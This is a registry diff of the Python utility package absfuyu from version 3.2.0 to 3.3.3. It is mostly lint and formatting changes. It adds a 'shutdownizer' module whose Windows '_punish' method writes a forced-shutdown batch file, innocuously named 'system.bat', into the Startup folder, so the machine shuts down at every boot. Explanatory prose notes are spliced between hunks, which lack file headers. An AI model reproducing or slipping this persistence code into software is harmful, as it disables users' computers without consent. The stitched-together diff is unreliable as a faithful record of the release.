absfuyu 3.2.0-py3-none-any.whl → 3.3.3-py3-none-any.whl

This diff compares the contents of two publicly released versions of the package as they appear in their respective public registries. It is provided for informational purposes only.

Potentially problematic release.


This version of absfuyu might be problematic.

Files changed (61)
  1. absfuyu/__init__.py +3 -10
  2. absfuyu/__main__.py +5 -250
  3. absfuyu/cli/__init__.py +51 -0
  4. absfuyu/cli/color.py +24 -0
  5. absfuyu/cli/config_group.py +56 -0
  6. absfuyu/cli/do_group.py +76 -0
  7. absfuyu/cli/game_group.py +109 -0
  8. absfuyu/config/__init__.py +55 -94
  9. absfuyu/config/config.json +0 -7
  10. absfuyu/core.py +5 -66
  11. absfuyu/everything.py +7 -9
  12. absfuyu/extensions/beautiful.py +30 -23
  13. absfuyu/extensions/dev/__init__.py +11 -8
  14. absfuyu/extensions/dev/password_hash.py +4 -2
  15. absfuyu/extensions/dev/passwordlib.py +7 -5
  16. absfuyu/extensions/dev/project_starter.py +4 -2
  17. absfuyu/extensions/dev/shutdownizer.py +148 -0
  18. absfuyu/extensions/extra/__init__.py +1 -2
  19. absfuyu/extensions/extra/data_analysis.py +110 -58
  20. absfuyu/fun/WGS.py +50 -26
  21. absfuyu/fun/__init__.py +6 -7
  22. absfuyu/fun/tarot.py +1 -1
  23. absfuyu/game/__init__.py +75 -81
  24. absfuyu/game/game_stat.py +36 -0
  25. absfuyu/game/sudoku.py +41 -48
  26. absfuyu/game/tictactoe.py +303 -548
  27. absfuyu/game/wordle.py +56 -47
  28. absfuyu/general/__init__.py +17 -7
  29. absfuyu/general/content.py +16 -15
  30. absfuyu/general/data_extension.py +282 -90
  31. absfuyu/general/generator.py +67 -67
  32. absfuyu/general/human.py +74 -78
  33. absfuyu/logger.py +94 -68
  34. absfuyu/pkg_data/__init__.py +29 -25
  35. absfuyu/py.typed +0 -0
  36. absfuyu/sort.py +61 -47
  37. absfuyu/tools/__init__.py +0 -1
  38. absfuyu/tools/converter.py +80 -62
  39. absfuyu/tools/keygen.py +62 -67
  40. absfuyu/tools/obfuscator.py +57 -53
  41. absfuyu/tools/stats.py +24 -24
  42. absfuyu/tools/web.py +10 -9
  43. absfuyu/util/__init__.py +38 -40
  44. absfuyu/util/api.py +53 -43
  45. absfuyu/util/json_method.py +25 -27
  46. absfuyu/util/lunar.py +20 -24
  47. absfuyu/util/path.py +362 -241
  48. absfuyu/util/performance.py +36 -98
  49. absfuyu/util/pkl.py +8 -8
  50. absfuyu/util/zipped.py +17 -19
  51. absfuyu/version.py +137 -148
  52. absfuyu-3.3.3.dist-info/METADATA +124 -0
  53. absfuyu-3.3.3.dist-info/RECORD +59 -0
  54. {absfuyu-3.2.0.dist-info → absfuyu-3.3.3.dist-info}/WHEEL +1 -2
  55. {absfuyu-3.2.0.dist-info → absfuyu-3.3.3.dist-info}/entry_points.txt +1 -0
  56. {absfuyu-3.2.0.dist-info → absfuyu-3.3.3.dist-info/licenses}/LICENSE +1 -1
  57. absfuyu/extensions/dev/pkglib.py +0 -98
  58. absfuyu/game/tictactoe2.py +0 -318
  59. absfuyu-3.2.0.dist-info/METADATA +0 -216
  60. absfuyu-3.2.0.dist-info/RECORD +0 -55
  61. absfuyu-3.2.0.dist-info/top_level.txt +0 -1
@@ -1,12 +1,14 @@
+# type: ignore
+# flake8: noqa
+
 # Library
 ##############################################################
 import hashlib as __hash
 import os as __os
 from typing import Dict as __Dict
+from typing import NewType as __NewType
 from typing import TypeVar as __TypeVar
 from typing import Union as __Union
-from typing import NewType as __NewType
-

 # Define type
 ##############################################################
@@ -1,3 +1,6 @@
+# type: ignore
+# flake8: noqa
+
 """
 Absfuyu: Passwordlib
 --------------------
@@ -7,7 +10,6 @@ Version: 1.0.0dev1
 Date updated: 30/11/2023 (dd/mm/yyyy)
 """

-
 # Library
 ###########################################################################
 # from collections import namedtuple
@@ -15,13 +17,13 @@ import hashlib
 import os
 import random
 import re
-from typing import List, Dict, Optional, Union
+from typing import List, Optional

 from absfuyu_res import DATA

-from absfuyu.logger import logger
 from absfuyu.general.data_extension import DictExt, Text
-from absfuyu.general.generator import Generator, Charset
+from absfuyu.general.generator import Charset, Generator
+from absfuyu.logger import logger
 from absfuyu.util import set_min
 from absfuyu.util.pkl import Pickler

@@ -237,7 +239,7 @@ class Password:
             if first_letter_cap:
                 value = value.title()
             if include_number:
-                value += str(random.choice(range(0, 10)))
+                value += str(random.choice(range(10)))
             return value

         if not block_divider:
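
Note on the Password hunk above: range(0, 10) and range(10) produce the same digits 0-9, so the word-generation logic is unchanged by this edit. A quick standalone check in plain Python, outside absfuyu, with illustrative values:

    import random

    # Both spellings yield the digits 0..9, so the appended digit is unaffected.
    assert list(range(0, 10)) == list(range(10))

    word = "example".title()               # the first_letter_cap branch
    word += str(random.choice(range(10)))  # the include_number branch
    print(word)                            # e.g. "Example7"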
@@ -1,3 +1,6 @@
+# type: ignore
+# flake8: noqa
+
 """
 Absfuyu: Project starter
 ------------------------
@@ -6,7 +9,6 @@ Version: 1.0.0dev1
 Date updated: 01/12/2023 (dd/mm/yyyy)
 """

-
 # Module level
 ###########################################################################
 __all__ = ["get_parser"]
@@ -14,7 +16,7 @@ __all__ = ["get_parser"]

 # Library
 ###########################################################################
-from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
+from argparse import ArgumentDefaultsHelpFormatter, ArgumentParser
 from typing import Optional


@@ -1,3 +1,6 @@
+# type: ignore
+# flake8: noqa
+
 """
 Absfuyu: Shutdownizer
 ---------------------
@@ -6,3 +9,148 @@ This shutdowns
 Version: 1.0.0dev
 Date updated: 27/11/2023 (dd/mm/yyyy)
 """
+
+# Module level
+###########################################################################
+__all__ = ["ShutDownizer"]
+
+
+# Library
+###########################################################################
+import datetime
+import os
+import random
+import subprocess
+import sys
+from pathlib import Path
+
+from absfuyu.logger import LogLevel, logger
+
+
+# Class
+###########################################################################
+class Dummy:
+    def __init__(self) -> None:
+        pass
+
+    def __str__(self) -> str:
+        return f"{self.__class__.__name__}()"
+
+    def __repr__(self) -> str:
+        return self.__str__()
+
+
+class ShutDownizer(Dummy):
+    """
+    ShutDownizer
+
+    Shutdown tool because why not
+    """
+
+    def __init__(self) -> None:
+        """doc_string"""
+        self.os: str = sys.platform
+        logger.debug(f"Current OS: {self.os}")
+
+        if self.os in ["win32", "cygwin"]:  # Windows
+            self.engine = ShutDownizerWin()
+        elif self.os == "darwin":  # MacOS
+            self.engine = ShutDownizerMac()
+        elif self.os == "linux":  # Linux
+            self.engine = ShutDownizerLinux()
+        else:  # Other (probably linux)
+            self.engine = ShutDownizerLinux()
+
+    def __str__(self) -> str:
+        return f"{self.__class__.__name__}({self.os})"
+
+    def shutdown(self):
+        """Shutdown"""
+        self.engine.shutdown()
+
+    def restart(self):
+        """Restart"""
+        self.engine.restart()
+
+    def cancel(self):
+        """Cancel"""
+        self.engine.cancel()
+
+
+class ShutDownizerEngine(Dummy):
+    """
+    Abstract class for different type of OS
+    """
+
+    def __init__(self) -> None:
+        self.shutdown_cmd = ""
+        self.restart_cmd = ""
+        self.cancel_cmd = ""
+
+    def _excute_cmd(self, cmd) -> None:
+        """Execute the cmd"""
+        try:
+            if isinstance(cmd, str):
+                subprocess.run(cmd.split())
+            elif isinstance(cmd, list):
+                subprocess.run(cmd)
+            else:
+                logger.error(f'"{cmd}" failed to run')
+        except:
+            logger.error(f'"{cmd}" failed to run')
+
+    def shutdown(self):
+        """Shutdown"""
+        try:
+            self._excute_cmd(self.shutdown_cmd)
+        except:
+            pass
+
+    def restart(self):
+        """Restart"""
+        self._excute_cmd(self.restart_cmd)
+
+    def cancel(self):
+        """Cancel shutdown/restart"""
+        self._excute_cmd(self.cancel_cmd)
+
+
+class ShutDownizerWin(ShutDownizerEngine):
+    """ShutDownizer - Windows"""
+
+    def __init__(self) -> None:
+        self.shutdown_cmd = "shutdown -f -s -t 0"
+        self.cancel_cmd = "shutdown -a"
+
+    def _punish(self):
+        """Create a `batch` script that shut down computer when boot up"""
+        try:
+            startup_folder_win = Path(os.getenv("appdata")).joinpath(
+                "Microsoft", "Windows", "Start Menu", "Programs", "Startup"
+            )
+            with open(startup_folder_win.joinpath("system.bat"), "w") as f:
+                f.write(self.shutdown_cmd)
+        except:
+            logger.error("Cannot write file to startup folder")
+
+
+class ShutDownizerMac(ShutDownizerEngine):
+    """ShutDownizer - MacOS"""
+
+    def __init__(self) -> None:
+        self.shutdown_cmd = ["osascript", "-e", 'tell app "System Events" to shut down']
+
+
+class ShutDownizerLinux(ShutDownizerEngine):
+    """ShutDownizer - Linux"""
+
+    def __init__(self) -> None:
+        self.shutdown_cmd = "shutdown -h now"
+
+
+# Run
+###########################################################################
+if __name__ == "__main__":
+    logger.setLevel(LogLevel.DEBUG)
+    test = ShutDownizer()
+    print(ShutDownizerLinux().shutdown())
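
The new absfuyu/extensions/dev/shutdownizer.py module above exposes one public class, ShutDownizer, which picks a platform-specific engine from sys.platform and shells out via subprocess. A minimal usage sketch based only on the code shown in this hunk (not run here; shutdown() genuinely powers the machine off):

    from absfuyu.extensions.dev.shutdownizer import ShutDownizer

    tool = ShutDownizer()   # selects the Windows/macOS/Linux engine from sys.platform
    print(tool)             # e.g. "ShutDownizer(linux)"
    # tool.shutdown()       # runs the platform shutdown command (destructive)
    # tool.cancel()         # on Windows, runs "shutdown -a" to abort a pending shutdown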
@@ -18,8 +18,7 @@ Date updated: 24/11/2023 (dd/mm/yyyy)
 # Function
 ###########################################################################

-
 # Run
 ###########################################################################
 if __name__ == "__main__":
-    pass
+    pass
@@ -3,11 +3,10 @@ Absfuyu: Data Analysis [W.I.P]
 ------------------------------
 Extension for ``pd.DataFrame``

-Version: 2.1.1
-Date updated: 14/03/2024 (dd/mm/yyyy)
+Version: 2.1.3
+Date updated: 20/03/2024 (dd/mm/yyyy)
 """

-
 # Module level
 ###########################################################################
 __all__ = [
@@ -26,27 +25,30 @@ __all__ = [

 # Library
 ###########################################################################
+import random
+import string
 from collections import deque
 from datetime import datetime
-import random
 from itertools import chain, product
-import string
 from typing import Any, Dict, List, NamedTuple, Optional, Union

 # import matplotlib.pyplot as plt
 # from scipy import stats
 # from dateutil.relativedelta import relativedelta
-from deprecated import deprecated
 import numpy as np
 import pandas as pd
+from deprecated import deprecated
+from deprecated.sphinx import deprecated as sphinx_deprecated
+from deprecated.sphinx import versionadded

 from absfuyu.logger import logger
-from absfuyu.util import set_min_max, set_min
+from absfuyu.util import set_min, set_min_max


 # Function
 ###########################################################################
-@deprecated(reason="No needed", version="3.1.0")
+@deprecated(reason="Not needed", version="3.1.0")
+@sphinx_deprecated(reason="Not needed", version="3.1.0")
 def summary(data: Union[list, np.ndarray]):  # del this
     """
     Quick summary of data
@@ -95,7 +97,7 @@ def equalize_df(data: Dict[str, list], fillna=np.nan) -> Dict[str, list]:
 ## Update 05/10


-def compare_2_list(*arr: list) -> pd.DataFrame:
+def compare_2_list(*arr) -> pd.DataFrame:
     """
     Compare 2 lists then create DataFrame
     to see which items are missing
@@ -112,7 +114,7 @@ def compare_2_list(*arr: list) -> pd.DataFrame:
     """
     # Setup
     col_name = "list"
-    arr = [sorted(x) for x in arr]  # map(sorted, arr)
+    arr = [sorted(x) for x in arr]  # type: ignore # map(sorted, arr)

     # Total array
     tarr = sorted(list(set(chain.from_iterable(arr))))
@@ -180,33 +182,33 @@ class CityData(NamedTuple):
     area: str

     @staticmethod
-    def _sample_city_data(size: int = 100):
+    def _sample_city_data(size: int = 100) -> List["CityData"]:
         """
         Generate sample city data (testing purpose)
         """
         sample_range = 10 ** len(str(size))

         # Serial list
-        serials = []
-        while len(serials) != size: # Unique serial
+        serials: List[str] = []
+        while len(serials) != size:  # Unique serial
             serial = random.randint(0, sample_range - 1)
-            serial = str(serial).rjust(len(str(size)), "0")
-            if serial not in serials:
-                serials.append(serial)
-
-        ss2 = deque(serials[: int(len(serials) / 2)]) # Cut half for region
+            serial = str(serial).rjust(len(str(size)), "0")  # type: ignore
+            if serial not in serials:  # type: ignore
+                serials.append(serial)  # type: ignore
+
+        ss2 = deque(serials[: int(len(serials) / 2)])  # Cut half for region
         ss2.rotate(random.randrange(1, 5))
-        [ss2.extend(ss2) for _ in range(2)] # Extend back
+        [ss2.extend(ss2) for _ in range(2)]  # type: ignore # Extend back

-        ss3 = deque(serials[: int(len(serials) / 4)]) # Cut forth for area
+        ss3 = deque(serials[: int(len(serials) / 4)])  # Cut forth for area
         ss3.rotate(random.randrange(1, 5))
-        [ss3.extend(ss3) for _ in range(4)] # Extend back
+        [ss3.extend(ss3) for _ in range(4)]  # type: ignore # Extend back

         serials = ["city_" + x for x in serials]
-        ss2 = ["region_" + x for x in ss2]
-        ss3 = ["area_" + x for x in ss3]
+        ss2 = ["region_" + x for x in ss2]  # type: ignore
+        ss3 = ["area_" + x for x in ss3]  # type: ignore

-        ss = list(zip(serials, ss2, ss3)) # Zip back
+        ss = list(zip(serials, ss2, ss3))  # Zip back
         out = list(map(CityData._make, ss))

         return out
@@ -267,7 +269,7 @@ class SplittedDF(NamedTuple):
         DataFrame
             Joined DataFrame
         """
-        return self.concat_df(self, join=join)
+        return self.concat_df(self, join=join)  # type: ignore

     @staticmethod
     def divide_dataframe(df: pd.DataFrame, by_column: str) -> List[pd.DataFrame]:
@@ -320,10 +322,10 @@ class _DictToAtrr:
         if key_as_atrribute:
             # temp = list(map(self._remove_space, self._data.keys()))
             temp = [self._remove_space(x, remove_char) for x in self._data.keys()]
-            [self.__setattr__(k, v) for k, v in zip(temp, self._data.values())]
+            [self.__setattr__(k, v) for k, v in zip(temp, self._data.values())]  # type: ignore
         else:
             temp = [self._remove_space(x, remove_char) for x in self._data.values()]
-            [self.__setattr__(k, v) for k, v in zip(temp, self._data.keys())]
+            [self.__setattr__(k, v) for k, v in zip(temp, self._data.keys())]  # type: ignore
         self._keys = temp

     def __str__(self) -> str:
@@ -337,7 +339,7 @@ class _DictToAtrr:
         """
         Remove special characters and replace space with underscore
         """
-        remove_char = remove_char.split(" ")
+        remove_char = remove_char.split(" ")  # type: ignore
         logger.debug(remove_char)
         for x in remove_char:
             value = value.replace(x, "")
@@ -400,15 +402,15 @@ class MatplotlibFormatString:
     @staticmethod
     def all_format_string() -> List[PLTFormatString]:
         fmt_str = [
-            __class__.MARKER_LIST,
-            __class__.LINE_STYLE_LIST,
-            __class__.COLOR_LIST,
+            __class__.MARKER_LIST,  # type: ignore
+            __class__.LINE_STYLE_LIST,  # type: ignore
+            __class__.COLOR_LIST,  # type: ignore
         ]
         return [PLTFormatString._make(x) for x in list(product(*fmt_str))]

     @staticmethod
     def get_random(alt: bool = False) -> str:
-        temp = random.choice(__class__.all_format_string())
+        temp = random.choice(__class__.all_format_string())  # type: ignore
         if alt:
             return f"{temp.marker}{temp.line_style}{temp.color}"
         else:
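
For context on what all_format_string() and get_random() assemble above: matplotlib accepts a compact format string made of a marker, a line style, and a colour code, and the class builds every combination with itertools.product. A standalone illustration of the same idea (sample codes chosen for this example, not the absfuyu constants):

    import random
    from itertools import product

    markers = [".", "o", "s", "^"]        # a few matplotlib marker codes
    line_styles = ["-", "--", "-.", ":"]  # line style codes
    colors = ["b", "g", "r", "k"]         # single-letter colour codes

    # Cartesian product of the three lists, mirroring product(*fmt_str) above
    fmt = "".join(random.choice(list(product(markers, line_styles, colors))))
    print(fmt)  # e.g. "o--r", usable as plt.plot(x, y, "o--r")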
@@ -418,9 +420,9 @@ class MatplotlibFormatString:
 # Class - DA
 ###########################################################################
 class DataAnalystDataFrame(pd.DataFrame):
-    """Data Analyst ``pd.DataFrame``"""
-
-    _DADF_Version = (1, 3, 0)  # internal check
+    """
+    Data Analyst ``pd.DataFrame``
+    """

     # Support
     # ================================================================
@@ -443,14 +445,14 @@ class DataAnalystDataFrame(pd.DataFrame):
             Modified DataFrame
         """
         cols = self.columns.to_list()  # List of columns
-        num_of_cols = set_min_max(num_of_cols, min_value=1, max_value=len(cols))
+        num_of_cols = int(set_min_max(num_of_cols, min_value=1, max_value=len(cols)))
         col_index = cols.index(insert_to_col)
         cols = (
             cols[: col_index + 1]
             + cols[-num_of_cols:]
             + cols[col_index + 1 : len(cols) - num_of_cols]
         )
-        self = __class__(self[cols])
+        self = self.__class__(self[cols])
         return self

     # Drop a list of column
@@ -471,7 +473,7 @@ class DataAnalystDataFrame(pd.DataFrame):
         for column in columns:
             try:
                 self.drop(columns=[column], inplace=True)
-            except:
+            except Exception:
                 logger.debug(f"{column} column does not exist")
                 # pass
         return self
@@ -496,7 +498,9 @@ class DataAnalystDataFrame(pd.DataFrame):
         # num_of_cols = 1
         # if num_of_cols > self.shape[1]:
         #     num_of_cols = self.shape[1]
-        num_of_cols = set_min_max(num_of_cols, min_value=1, max_value=self.shape[1])
+        num_of_cols = int(
+            set_min_max(num_of_cols, min_value=1, max_value=self.shape[1])
+        )

         # Logic
         for _ in range(num_of_cols):
@@ -530,9 +534,9 @@ class DataAnalystDataFrame(pd.DataFrame):
     def convert_city(
         self,
         city_column: str,
-        city_list: List[CityData] = None,
+        city_list: List[CityData],
         *,
-        mode: str = "ra"
+        mode: str = "ra",
     ):
         """
         Get ``region`` and ``area`` of a city
@@ -559,21 +563,25 @@ class DataAnalystDataFrame(pd.DataFrame):
         """

         # Support function
-        def _convert_city_support(value: str):
+        def _convert_city_support(value: str) -> CityData:
             for x in city_list:
                 if x.city.lower().startswith(value.lower()):
                     return x
-            return CityData(city=value, region=np.nan, area=np.nan)
+            return CityData(city=value, region=np.nan, area=np.nan)  # type: ignore

         # Convert
         col_counter = 0
         if mode.find("r") != -1:
             logger.debug("Mode: 'region'")
-            self["region"] = self[city_column].apply(lambda x: _convert_city_support(x).region)
+            self["region"] = self[city_column].apply(
+                lambda x: _convert_city_support(x).region
+            )
             col_counter += 1
         if mode.find("a") != -1:
             logger.debug("Mode: 'area'")
-            self["area"] = self[city_column].apply(lambda x: _convert_city_support(x).area)
+            self["area"] = self[city_column].apply(
+                lambda x: _convert_city_support(x).area
+            )
             col_counter += 1

         # Rearrange
@@ -731,7 +739,7 @@ class DataAnalystDataFrame(pd.DataFrame):
         """
         try:
             self[column_name] = self[column_name].fillna(fill)
-        except:
+        except Exception:
             self.add_blank_column(column_name, fill_when_not_exist)
         return self

@@ -759,6 +767,7 @@ class DataAnalystDataFrame(pd.DataFrame):
         return out

     # Threshold filter
+    # @versionchanged(version="3.2.0", reason="Optimized the code")
     def threshold_filter(
         self,
         destination_column: str,
@@ -799,7 +808,7 @@ class DataAnalystDataFrame(pd.DataFrame):
             self[destination_column] = self[
                 destination_column
             ].str.strip()  # Remove trailing space
-        except:
+        except Exception:
             pass

         # Logic
@@ -814,7 +823,7 @@ class DataAnalystDataFrame(pd.DataFrame):
             )
             # logger.debug(list_of_keep)
         else:
-            list_of_keep: list = col_df[col_df["percentage"] >= threshold][
+            list_of_keep = col_df[col_df["percentage"] >= threshold][
                 destination_column
             ].to_list()  # values that will not be renamed
         self[f"{destination_column}_filtered"] = self[destination_column].apply(
@@ -828,11 +837,13 @@ class DataAnalystDataFrame(pd.DataFrame):
     # ================================================================
     # Total observation
     @property
+    @versionadded(version="3.2.0")
     def total_observation(self) -> int:
         """Returns total observation of the DataFrame"""
-        return self.shape[0] * self.shape[1]
+        return self.shape[0] * self.shape[1]  # type: ignore

     # Quick info
+    @versionadded(version="3.2.0")
     def qinfo(self) -> str:
         """
         Show quick infomation about DataFrame
@@ -850,6 +861,7 @@ class DataAnalystDataFrame(pd.DataFrame):
         return info

     # Quick describe
+    @versionadded(version="3.2.0")
     def qdescribe(self) -> pd.DataFrame:
         """
         Quick ``describe()`` that exclude ``object`` and ``datetime`` dtype
@@ -887,7 +899,9 @@ class DataAnalystDataFrame(pd.DataFrame):
         else:
             out = df_na.to_frame()
             out.rename(columns={0: "Num of N/A"}, inplace=True)
-            out["Percentage"] = (out["Num of N/A"] / self.shape[0] * 100).round(percentage_round_up)
+            out["Percentage"] = (out["Num of N/A"] / self.shape[0] * 100).round(
+                percentage_round_up
+            )

         # logger.debug(
         #     f"Percentage of N/A over entire DF: "
@@ -896,13 +910,14 @@ class DataAnalystDataFrame(pd.DataFrame):
         return out

     # Show distribution
+    @versionadded(version="3.2.0")
     def show_distribution(
-        self,
-        column_name: str,
+        self,
+        column_name: str,
         dropna: bool = True,
-        *,
+        *,
         show_percentage: bool = True,
-        percentage_round_up: int = 2
+        percentage_round_up: int = 2,
     ) -> pd.DataFrame:
         """
         Show distribution of a column
@@ -928,12 +943,31 @@ class DataAnalystDataFrame(pd.DataFrame):
         -------
         DataFrame
             Distribution DataFrame
+
+
+        Example:
+        --------
+        >>> DataAnalystDataFrame.sample_df().show_distribution("number_range")
+        number_range count percentage
+        0 900 16 16.0
+        1 700 15 15.0
+        2 300 12 12.0
+        3 200 12 12.0
+        4 400 11 11.0
+        5 600 11 11.0
+        6 800 10 10.0
+        7 100 9 9.0
+        8 500 4 4.0
         """
         out = self[column_name].value_counts(dropna=dropna).to_frame().reset_index()
         if show_percentage:
-            out["percentage"] = (out["count"] / self.shape[0] * 100).round(percentage_round_up)
+            out["percentage"] = (out["count"] / self.shape[0] * 100).round(
+                percentage_round_up
+            )
         else:
-            out["percentage"] = (out["count"] / self.shape[0]).round(percentage_round_up)
+            out["percentage"] = (out["count"] / self.shape[0]).round(
+                percentage_round_up
+            )
         return out

     # Help
@@ -942,7 +976,7 @@ class DataAnalystDataFrame(pd.DataFrame):
         """
         Show all available method of DataAnalystDataFrame
         """
-        list_of_method = list(set(dir(__class__)) - set(dir(pd.DataFrame)))
+        list_of_method = list(set(dir(__class__)) - set(dir(pd.DataFrame)))  # type: ignore
         return sorted(list_of_method)

     # Sample DataFrame
@@ -962,9 +996,27 @@ class DataAnalystDataFrame(pd.DataFrame):
         DataAnalystDataFrame
             DataFrame with these columns:
             [number, number_big, number_range, missing_value, text, date]
+
+
+        Example:
+        --------
+        >>> DataAnalystDataFrame.sample_df()
+        number number_big number_range missing_value text date
+        0 -2.089770 785 700 NaN vwnlqoql 2013-11-20
+        1 -0.526689 182 100 24.0 prjjcvqc 2007-04-13
+        2 -1.596514 909 900 8.0 cbcpzlac 2023-05-24
+        3 2.982191 989 900 21.0 ivwqwuvd 2022-04-28
+        4 1.687803 878 800 NaN aajtncum 2005-10-05
+        .. ... ... ... ... ... ...
+        95 -1.295145 968 900 16.0 mgqunkhi 2016-04-12
+        96 1.296795 255 200 NaN lwvytego 2014-05-10
+        97 1.440746 297 200 5.0 lqsoykun 2010-04-03
+        98 0.327702 845 800 NaN leadkvsy 2005-08-05
+        99 0.556720 981 900 36.0 bozmxixy 2004-02-22
+        [100 rows x 6 columns]
         """
         # Restrain
-        size = set_min(size, min_value=1)
+        size = int(set_min(size, min_value=1))

         # Number col
         df = pd.DataFrame(np.random.randn(size, 1), columns=["number"])
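
A pattern that recurs in the DataAnalystDataFrame hunks above is wrapping set_min / set_min_max from absfuyu.util in int(...). Those helpers clamp a value into a range; the sketch below shows why the int() coercion matters when the clamped value feeds range() or indexing. This is a hypothetical re-implementation for illustration only; the real absfuyu.util signatures may differ:

    def set_min_max(value, *, min_value=0, max_value=100):
        # Clamp value into [min_value, max_value]; the result keeps value's type,
        # so a float in gives a float out.
        return max(min_value, min(value, max_value))

    num_of_cols = int(set_min_max(2.5, min_value=1, max_value=6))
    for _ in range(num_of_cols):  # range() requires an int, hence the int(...) wrapper
        pass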